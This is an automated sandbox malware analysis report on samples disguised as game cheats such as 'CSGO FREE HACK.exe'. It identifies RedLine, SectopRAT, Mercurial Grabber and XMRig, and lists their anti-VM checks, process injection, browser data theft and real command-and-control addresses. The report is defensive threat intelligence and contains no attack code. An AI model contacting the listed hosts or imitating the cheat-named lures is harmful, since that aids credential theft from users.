Malware Analysis Report

2024-11-13 15:41

Sample ID 241109-ty4zcaxgrc
Target d42bb7f95b50972680b8a5f2f68ab5bee5450fc45cf15612d45cc00b1b65f0c2
SHA256 d42bb7f95b50972680b8a5f2f68ab5bee5450fc45cf15612d45cc00b1b65f0c2
Tags
spyware stealer redline sectoprat boss9 discovery infostealer rat trojan @krxstkrxst evasion themida @navi_gator rich @bestieffcs defense_evasion mercurialgrabber ninja0812 @killyxu asap execution xmrig miner
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral15

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral17

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral22

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral12

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral18

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral19

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral20

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral23

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral11

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral6

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral14

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral25

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral5

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral27

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral9

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral16

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral7

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral21

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral24

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral26

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral10

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral8

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral13

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral28

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

d42bb7f95b50972680b8a5f2f68ab5bee5450fc45cf15612d45cc00b1b65f0c2

Threat Level: Known bad

The file d42bb7f95b50972680b8a5f2f68ab5bee5450fc45cf15612d45cc00b1b65f0c2 was found to be: Known bad.

Malicious Activity Summary

spyware stealer redline sectoprat boss9 discovery infostealer rat trojan @krxstkrxst evasion themida @navi_gator rich @bestieffcs defense_evasion mercurialgrabber ninja0812 @killyxu asap execution xmrig miner

Mercurial Grabber Stealer

SectopRAT

RedLine payload

Mercurialgrabber family

Redline family

Xmrig family

SectopRAT payload

xmrig

RedLine

Sectoprat family

Looks for VirtualBox Guest Additions in registry

XMRig Miner payload

Identifies VirtualBox via ACPI registry values (likely anti-VM)

System Binary Proxy Execution: Regsvcs/Regasm

Command and Scripting Interpreter: PowerShell

Looks for VMWare Tools registry key

Executes dropped EXE

Checks BIOS information in registry

Checks computer location settings

Loads dropped DLL

Themida packer

Reads user/profile data of web browsers

Looks up external IP address via web service

Legitimate hosting services abused for malware hosting/C2

Checks whether UAC is enabled

Maps connected drives based on registry

Suspicious use of SetThreadContext

Suspicious use of NtSetInformationThreadHideFromDebugger

Unsigned PE

Enumerates physical storage devices

System Location Discovery: System Language Discovery

Browser Information Discovery

Program crash

Suspicious use of WriteProcessMemory

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: GetForegroundWindowSpam

Uses Task Scheduler COM API

Checks processor information in registry

Suspicious use of UnmapMainImage

Scheduled Task/Job: Scheduled Task

Suspicious behavior: EnumeratesProcesses

Modifies system certificate store

Checks SCSI registry key(s)

Enumerates system info in registry

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-09 16:29

Signatures

Mercurialgrabber family

mercurialgrabber

Themida packer

themida
Description Indicator Process Target
N/A N/A N/A N/A

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Analysis: behavioral15

Detonation Overview

Submitted

2024-11-09 16:28

Reported

2024-11-09 16:31

Platform

win7-20240903-en

Max time kernel

133s

Max time network

150s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Kiddions Mod MENU.exe"

Signatures

Reads user/profile data of web browsers

spyware stealer

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\Temp\Kiddions Mod MENU.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\AppData\Local\Temp\Kiddions Mod MENU.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Kiddions Mod MENU.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\Kiddions Mod MENU.exe

"C:\Users\Admin\AppData\Local\Temp\Kiddions Mod MENU.exe"

Network

Country Destination Domain Proto
NL 185.182.82.35:4420 tcp
NL 185.182.82.35:4420 tcp
NL 185.182.82.35:4420 tcp
NL 185.182.82.35:4420 tcp
NL 185.182.82.35:4420 tcp
NL 185.182.82.35:4420 tcp
NL 185.182.82.35:4420 tcp

Files

memory/2936-0-0x000007FEF62E3000-0x000007FEF62E4000-memory.dmp

memory/2936-1-0x0000000000010000-0x000000000003A000-memory.dmp

memory/2936-2-0x000007FEF62E0000-0x000007FEF6CCC000-memory.dmp

memory/2936-21-0x000007FEF62E3000-0x000007FEF62E4000-memory.dmp

memory/2936-22-0x000007FEF62E0000-0x000007FEF6CCC000-memory.dmp

Analysis: behavioral17

Detonation Overview

Submitted

2024-11-09 16:28

Reported

2024-11-09 16:31

Platform

win7-20240903-en

Max time kernel

130s

Max time network

141s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Minecraft_v4.5.exe"

Signatures

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Redline family

redline

SectopRAT

trojan rat sectoprat

SectopRAT payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Sectoprat family

sectoprat

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2492 set thread context of 2988 N/A C:\Users\Admin\AppData\Local\Temp\Minecraft_v4.5.exe C:\Users\Admin\AppData\Local\Temp\Minecraft_v4.5.exe

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Minecraft_v4.5.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Minecraft_v4.5.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Minecraft_v4.5.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2492 wrote to memory of 2988 N/A C:\Users\Admin\AppData\Local\Temp\Minecraft_v4.5.exe C:\Users\Admin\AppData\Local\Temp\Minecraft_v4.5.exe
PID 2492 wrote to memory of 2988 N/A C:\Users\Admin\AppData\Local\Temp\Minecraft_v4.5.exe C:\Users\Admin\AppData\Local\Temp\Minecraft_v4.5.exe
PID 2492 wrote to memory of 2988 N/A C:\Users\Admin\AppData\Local\Temp\Minecraft_v4.5.exe C:\Users\Admin\AppData\Local\Temp\Minecraft_v4.5.exe
PID 2492 wrote to memory of 2988 N/A C:\Users\Admin\AppData\Local\Temp\Minecraft_v4.5.exe C:\Users\Admin\AppData\Local\Temp\Minecraft_v4.5.exe
PID 2492 wrote to memory of 2988 N/A C:\Users\Admin\AppData\Local\Temp\Minecraft_v4.5.exe C:\Users\Admin\AppData\Local\Temp\Minecraft_v4.5.exe
PID 2492 wrote to memory of 2988 N/A C:\Users\Admin\AppData\Local\Temp\Minecraft_v4.5.exe C:\Users\Admin\AppData\Local\Temp\Minecraft_v4.5.exe
PID 2492 wrote to memory of 2988 N/A C:\Users\Admin\AppData\Local\Temp\Minecraft_v4.5.exe C:\Users\Admin\AppData\Local\Temp\Minecraft_v4.5.exe
PID 2492 wrote to memory of 2988 N/A C:\Users\Admin\AppData\Local\Temp\Minecraft_v4.5.exe C:\Users\Admin\AppData\Local\Temp\Minecraft_v4.5.exe
PID 2492 wrote to memory of 2988 N/A C:\Users\Admin\AppData\Local\Temp\Minecraft_v4.5.exe C:\Users\Admin\AppData\Local\Temp\Minecraft_v4.5.exe
PID 2492 wrote to memory of 2988 N/A C:\Users\Admin\AppData\Local\Temp\Minecraft_v4.5.exe C:\Users\Admin\AppData\Local\Temp\Minecraft_v4.5.exe
PID 2492 wrote to memory of 2988 N/A C:\Users\Admin\AppData\Local\Temp\Minecraft_v4.5.exe C:\Users\Admin\AppData\Local\Temp\Minecraft_v4.5.exe
PID 2492 wrote to memory of 2988 N/A C:\Users\Admin\AppData\Local\Temp\Minecraft_v4.5.exe C:\Users\Admin\AppData\Local\Temp\Minecraft_v4.5.exe

Processes

C:\Users\Admin\AppData\Local\Temp\Minecraft_v4.5.exe

"C:\Users\Admin\AppData\Local\Temp\Minecraft_v4.5.exe"

C:\Users\Admin\AppData\Local\Temp\Minecraft_v4.5.exe

"C:\Users\Admin\AppData\Local\Temp\Minecraft_v4.5.exe"

Network

Country Destination Domain Proto
RU 109.248.201.150:63757 tcp
RU 109.248.201.150:63757 tcp
RU 109.248.201.150:63757 tcp
RU 109.248.201.150:63757 tcp
RU 109.248.201.150:63757 tcp

Files

memory/2492-0-0x000000007411E000-0x000000007411F000-memory.dmp

memory/2492-1-0x00000000011C0000-0x0000000001304000-memory.dmp

memory/2492-2-0x0000000074110000-0x00000000747FE000-memory.dmp

memory/2492-3-0x000000007411E000-0x000000007411F000-memory.dmp

memory/2492-4-0x0000000074110000-0x00000000747FE000-memory.dmp

memory/2492-5-0x00000000003F0000-0x0000000000412000-memory.dmp

memory/2988-10-0x0000000000400000-0x000000000041E000-memory.dmp

memory/2988-12-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

memory/2988-6-0x0000000000400000-0x000000000041E000-memory.dmp

memory/2988-8-0x0000000000400000-0x000000000041E000-memory.dmp

memory/2988-11-0x0000000000400000-0x000000000041E000-memory.dmp

memory/2988-14-0x0000000000400000-0x000000000041E000-memory.dmp

memory/2988-21-0x0000000074110000-0x00000000747FE000-memory.dmp

memory/2492-20-0x0000000074110000-0x00000000747FE000-memory.dmp

memory/2988-19-0x0000000000400000-0x000000000041E000-memory.dmp

memory/2988-16-0x0000000000400000-0x000000000041E000-memory.dmp

memory/2988-22-0x0000000074110000-0x00000000747FE000-memory.dmp

memory/2988-23-0x0000000074110000-0x00000000747FE000-memory.dmp

Analysis: behavioral22

Detonation Overview

Submitted

2024-11-09 16:28

Reported

2024-11-09 16:31

Platform

win10v2004-20241007-en

Max time kernel

149s

Max time network

155s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Vape Patch.exe"

Signatures

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A

Redline family

redline

SectopRAT

trojan rat sectoprat

SectopRAT payload

Description Indicator Process Target
N/A N/A N/A N/A

Sectoprat family

sectoprat

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 3972 set thread context of 1612 N/A C:\Users\Admin\AppData\Local\Temp\Vape Patch.exe C:\Users\Admin\AppData\Local\Temp\Vape Patch.exe

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Vape Patch.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Vape Patch.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Vape Patch.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\Vape Patch.exe

"C:\Users\Admin\AppData\Local\Temp\Vape Patch.exe"

C:\Users\Admin\AppData\Local\Temp\Vape Patch.exe

"C:\Users\Admin\AppData\Local\Temp\Vape Patch.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
US 8.8.8.8:53 83.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 136.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 jonaianell.xyz udp
US 8.8.8.8:53 jonaianell.xyz udp
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 jonaianell.xyz udp
US 8.8.8.8:53 jonaianell.xyz udp
US 8.8.8.8:53 jonaianell.xyz udp
US 8.8.8.8:53 197.87.175.4.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 jonaianell.xyz udp
US 8.8.8.8:53 73.209.201.84.in-addr.arpa udp
US 8.8.8.8:53 jonaianell.xyz udp
US 8.8.8.8:53 jonaianell.xyz udp
US 8.8.8.8:53 jonaianell.xyz udp
US 8.8.8.8:53 jonaianell.xyz udp
US 8.8.8.8:53 jonaianell.xyz udp
US 8.8.8.8:53 jonaianell.xyz udp
US 8.8.8.8:53 88.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 jonaianell.xyz udp
US 8.8.8.8:53 jonaianell.xyz udp
US 8.8.8.8:53 jonaianell.xyz udp
US 8.8.8.8:53 jonaianell.xyz udp
US 8.8.8.8:53 jonaianell.xyz udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 14.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 jonaianell.xyz udp
US 8.8.8.8:53 jonaianell.xyz udp
US 8.8.8.8:53 jonaianell.xyz udp
US 8.8.8.8:53 jonaianell.xyz udp
US 8.8.8.8:53 jonaianell.xyz udp
US 8.8.8.8:53 jonaianell.xyz udp
US 8.8.8.8:53 jonaianell.xyz udp
US 8.8.8.8:53 jonaianell.xyz udp
US 8.8.8.8:53 jonaianell.xyz udp
US 8.8.8.8:53 jonaianell.xyz udp
US 8.8.8.8:53 jonaianell.xyz udp
US 8.8.8.8:53 8.173.189.20.in-addr.arpa udp

Files

memory/3972-0-0x0000000074BDE000-0x0000000074BDF000-memory.dmp

memory/3972-1-0x0000000000B50000-0x0000000000BB4000-memory.dmp

memory/3972-2-0x0000000005560000-0x00000000055D6000-memory.dmp

memory/3972-3-0x00000000054E0000-0x00000000054FE000-memory.dmp

memory/3972-4-0x0000000074BD0000-0x0000000075380000-memory.dmp

memory/3972-5-0x0000000005D00000-0x00000000062A4000-memory.dmp

memory/1612-6-0x0000000000400000-0x000000000041E000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Vape Patch.exe.log

MD5 e5352797047ad2c91b83e933b24fbc4f
SHA1 9bf8ac99b6cbf7ce86ce69524c25e3df75b4d772
SHA256 b4643874d42d232c55bfbb75c36da41809d0c9ba4b2a203049aa82950345325c
SHA512 dd2fc1966c8b3c9511f14801d1ce8110d6bca276a58216b5eeb0a3cfbb0cc8137ea14efbf790e63736230141da456cbaaa4e5c66f2884d4cfe68f499476fd827

memory/1612-9-0x0000000005450000-0x0000000005A68000-memory.dmp

memory/3972-10-0x0000000074BD0000-0x0000000075380000-memory.dmp

memory/1612-12-0x0000000074BD0000-0x0000000075380000-memory.dmp

memory/1612-11-0x0000000004F60000-0x0000000004F72000-memory.dmp

memory/1612-13-0x0000000005000000-0x000000000503C000-memory.dmp

memory/1612-14-0x0000000005040000-0x000000000508C000-memory.dmp

memory/1612-15-0x0000000074BD0000-0x0000000075380000-memory.dmp

memory/1612-16-0x00000000052B0000-0x00000000053BA000-memory.dmp

memory/1612-17-0x0000000074BD0000-0x0000000075380000-memory.dmp

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-09 16:28

Reported

2024-11-09 16:31

Platform

win7-20241023-en

Max time kernel

140s

Max time network

146s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Bird.exe"

Signatures

SectopRAT

trojan rat sectoprat

SectopRAT payload

Description Indicator Process Target
N/A N/A N/A N/A

Sectoprat family

sectoprat

Identifies VirtualBox via ACPI registry values (likely anti-VM)

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\Bird.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\Bird.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\Bird.exe N/A

Themida packer

themida
Description Indicator Process Target
N/A N/A N/A N/A

Checks whether UAC is enabled

evasion trojan
Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Local\Temp\Bird.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Bird.exe N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Bird.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Bird.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Bird.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\Bird.exe

"C:\Users\Admin\AppData\Local\Temp\Bird.exe"

Network

Country Destination Domain Proto
FI 65.21.103.71:56458 tcp
FI 65.21.103.71:56458 tcp
FI 65.21.103.71:56458 tcp
FI 65.21.103.71:56458 tcp
FI 65.21.103.71:56458 tcp
FI 65.21.103.71:56458 tcp

Files

memory/1972-0-0x00000000008B0000-0x0000000000F0E000-memory.dmp

memory/1972-1-0x00000000763F1000-0x00000000763F2000-memory.dmp

memory/1972-14-0x00000000763E0000-0x00000000764F0000-memory.dmp

memory/1972-20-0x00000000763E0000-0x00000000764F0000-memory.dmp

memory/1972-19-0x00000000763E0000-0x00000000764F0000-memory.dmp

memory/1972-18-0x00000000763E0000-0x00000000764F0000-memory.dmp

memory/1972-17-0x00000000763E0000-0x00000000764F0000-memory.dmp

memory/1972-16-0x00000000763E0000-0x00000000764F0000-memory.dmp

memory/1972-15-0x00000000763E0000-0x00000000764F0000-memory.dmp

memory/1972-13-0x00000000763E0000-0x00000000764F0000-memory.dmp

memory/1972-12-0x00000000763E0000-0x00000000764F0000-memory.dmp

memory/1972-11-0x00000000763E0000-0x00000000764F0000-memory.dmp

memory/1972-10-0x00000000763E0000-0x00000000764F0000-memory.dmp

memory/1972-9-0x00000000763E0000-0x00000000764F0000-memory.dmp

memory/1972-8-0x00000000763E0000-0x00000000764F0000-memory.dmp

memory/1972-7-0x00000000763E0000-0x00000000764F0000-memory.dmp

memory/1972-6-0x00000000763E0000-0x00000000764F0000-memory.dmp

memory/1972-5-0x00000000763E0000-0x00000000764F0000-memory.dmp

memory/1972-4-0x00000000763E0000-0x00000000764F0000-memory.dmp

memory/1972-3-0x00000000763E0000-0x00000000764F0000-memory.dmp

memory/1972-2-0x00000000763E0000-0x00000000764F0000-memory.dmp

memory/1972-25-0x00000000763E0000-0x00000000764F0000-memory.dmp

memory/1972-26-0x00000000763E0000-0x00000000764F0000-memory.dmp

memory/1972-27-0x00000000763E0000-0x00000000764F0000-memory.dmp

memory/1972-28-0x00000000008B0000-0x0000000000F0E000-memory.dmp

memory/1972-29-0x00000000008B0000-0x0000000000F0E000-memory.dmp

memory/1972-30-0x00000000763F1000-0x00000000763F2000-memory.dmp

memory/1972-31-0x00000000763E0000-0x00000000764F0000-memory.dmp

memory/1972-33-0x00000000763E0000-0x00000000764F0000-memory.dmp

Analysis: behavioral3

Detonation Overview

Submitted

2024-11-09 16:28

Reported

2024-11-09 16:31

Platform

win7-20240903-en

Max time kernel

137s

Max time network

151s

Command Line

"C:\Users\Admin\AppData\Local\Temp\CSGO FREE HACK.exe"

Signatures

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Redline family

redline

SectopRAT

trojan rat sectoprat

SectopRAT payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Sectoprat family

sectoprat

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2596 set thread context of 2316 N/A C:\Users\Admin\AppData\Local\Temp\CSGO FREE HACK.exe C:\Users\Admin\AppData\Local\Temp\CSGO FREE HACK.exe

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\CSGO FREE HACK.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\CSGO FREE HACK.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\CSGO FREE HACK.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2596 wrote to memory of 1340 N/A C:\Users\Admin\AppData\Local\Temp\CSGO FREE HACK.exe C:\Users\Admin\AppData\Local\Temp\CSGO FREE HACK.exe
PID 2596 wrote to memory of 1340 N/A C:\Users\Admin\AppData\Local\Temp\CSGO FREE HACK.exe C:\Users\Admin\AppData\Local\Temp\CSGO FREE HACK.exe
PID 2596 wrote to memory of 1340 N/A C:\Users\Admin\AppData\Local\Temp\CSGO FREE HACK.exe C:\Users\Admin\AppData\Local\Temp\CSGO FREE HACK.exe
PID 2596 wrote to memory of 1340 N/A C:\Users\Admin\AppData\Local\Temp\CSGO FREE HACK.exe C:\Users\Admin\AppData\Local\Temp\CSGO FREE HACK.exe
PID 2596 wrote to memory of 2316 N/A C:\Users\Admin\AppData\Local\Temp\CSGO FREE HACK.exe C:\Users\Admin\AppData\Local\Temp\CSGO FREE HACK.exe
PID 2596 wrote to memory of 2316 N/A C:\Users\Admin\AppData\Local\Temp\CSGO FREE HACK.exe C:\Users\Admin\AppData\Local\Temp\CSGO FREE HACK.exe
PID 2596 wrote to memory of 2316 N/A C:\Users\Admin\AppData\Local\Temp\CSGO FREE HACK.exe C:\Users\Admin\AppData\Local\Temp\CSGO FREE HACK.exe
PID 2596 wrote to memory of 2316 N/A C:\Users\Admin\AppData\Local\Temp\CSGO FREE HACK.exe C:\Users\Admin\AppData\Local\Temp\CSGO FREE HACK.exe
PID 2596 wrote to memory of 2316 N/A C:\Users\Admin\AppData\Local\Temp\CSGO FREE HACK.exe C:\Users\Admin\AppData\Local\Temp\CSGO FREE HACK.exe
PID 2596 wrote to memory of 2316 N/A C:\Users\Admin\AppData\Local\Temp\CSGO FREE HACK.exe C:\Users\Admin\AppData\Local\Temp\CSGO FREE HACK.exe
PID 2596 wrote to memory of 2316 N/A C:\Users\Admin\AppData\Local\Temp\CSGO FREE HACK.exe C:\Users\Admin\AppData\Local\Temp\CSGO FREE HACK.exe
PID 2596 wrote to memory of 2316 N/A C:\Users\Admin\AppData\Local\Temp\CSGO FREE HACK.exe C:\Users\Admin\AppData\Local\Temp\CSGO FREE HACK.exe
PID 2596 wrote to memory of 2316 N/A C:\Users\Admin\AppData\Local\Temp\CSGO FREE HACK.exe C:\Users\Admin\AppData\Local\Temp\CSGO FREE HACK.exe

Processes

C:\Users\Admin\AppData\Local\Temp\CSGO FREE HACK.exe

"C:\Users\Admin\AppData\Local\Temp\CSGO FREE HACK.exe"

C:\Users\Admin\AppData\Local\Temp\CSGO FREE HACK.exe

"C:\Users\Admin\AppData\Local\Temp\CSGO FREE HACK.exe"

C:\Users\Admin\AppData\Local\Temp\CSGO FREE HACK.exe

"C:\Users\Admin\AppData\Local\Temp\CSGO FREE HACK.exe"

Network

Country Destination Domain Proto
DE 136.244.80.139:40533 tcp
DE 136.244.80.139:40533 tcp
DE 136.244.80.139:40533 tcp
DE 136.244.80.139:40533 tcp
DE 136.244.80.139:40533 tcp
DE 136.244.80.139:40533 tcp

Files

memory/2596-0-0x0000000073EFE000-0x0000000073EFF000-memory.dmp

memory/2596-1-0x0000000000060000-0x00000000000FA000-memory.dmp

memory/2596-2-0x0000000073EF0000-0x00000000745DE000-memory.dmp

memory/2316-13-0x0000000000400000-0x000000000041E000-memory.dmp

memory/2316-11-0x0000000000400000-0x000000000041E000-memory.dmp

memory/2316-16-0x0000000000400000-0x000000000041E000-memory.dmp

memory/2596-17-0x0000000073EF0000-0x00000000745DE000-memory.dmp

memory/2316-5-0x0000000000400000-0x000000000041E000-memory.dmp

memory/2316-9-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

memory/2316-3-0x0000000000400000-0x000000000041E000-memory.dmp

memory/2316-8-0x0000000000400000-0x000000000041E000-memory.dmp

memory/2316-7-0x0000000000400000-0x000000000041E000-memory.dmp

memory/2316-18-0x0000000073EF0000-0x00000000745DE000-memory.dmp

memory/2316-19-0x0000000073EF0000-0x00000000745DE000-memory.dmp

memory/2316-20-0x0000000073EF0000-0x00000000745DE000-memory.dmp

Analysis: behavioral4

Detonation Overview

Submitted

2024-11-09 16:28

Reported

2024-11-09 16:31

Platform

win10v2004-20241007-en

Max time kernel

138s

Max time network

150s

Command Line

"C:\Users\Admin\AppData\Local\Temp\CSGO FREE HACK.exe"

Signatures

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A

Redline family

redline

SectopRAT

trojan rat sectoprat

SectopRAT payload

Description Indicator Process Target
N/A N/A N/A N/A

Sectoprat family

sectoprat

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 3880 set thread context of 3656 N/A C:\Users\Admin\AppData\Local\Temp\CSGO FREE HACK.exe C:\Users\Admin\AppData\Local\Temp\CSGO FREE HACK.exe

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\CSGO FREE HACK.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\CSGO FREE HACK.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\CSGO FREE HACK.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3880 wrote to memory of 4136 N/A C:\Users\Admin\AppData\Local\Temp\CSGO FREE HACK.exe C:\Users\Admin\AppData\Local\Temp\CSGO FREE HACK.exe
PID 3880 wrote to memory of 4136 N/A C:\Users\Admin\AppData\Local\Temp\CSGO FREE HACK.exe C:\Users\Admin\AppData\Local\Temp\CSGO FREE HACK.exe
PID 3880 wrote to memory of 4136 N/A C:\Users\Admin\AppData\Local\Temp\CSGO FREE HACK.exe C:\Users\Admin\AppData\Local\Temp\CSGO FREE HACK.exe
PID 3880 wrote to memory of 3656 N/A C:\Users\Admin\AppData\Local\Temp\CSGO FREE HACK.exe C:\Users\Admin\AppData\Local\Temp\CSGO FREE HACK.exe
PID 3880 wrote to memory of 3656 N/A C:\Users\Admin\AppData\Local\Temp\CSGO FREE HACK.exe C:\Users\Admin\AppData\Local\Temp\CSGO FREE HACK.exe
PID 3880 wrote to memory of 3656 N/A C:\Users\Admin\AppData\Local\Temp\CSGO FREE HACK.exe C:\Users\Admin\AppData\Local\Temp\CSGO FREE HACK.exe
PID 3880 wrote to memory of 3656 N/A C:\Users\Admin\AppData\Local\Temp\CSGO FREE HACK.exe C:\Users\Admin\AppData\Local\Temp\CSGO FREE HACK.exe
PID 3880 wrote to memory of 3656 N/A C:\Users\Admin\AppData\Local\Temp\CSGO FREE HACK.exe C:\Users\Admin\AppData\Local\Temp\CSGO FREE HACK.exe
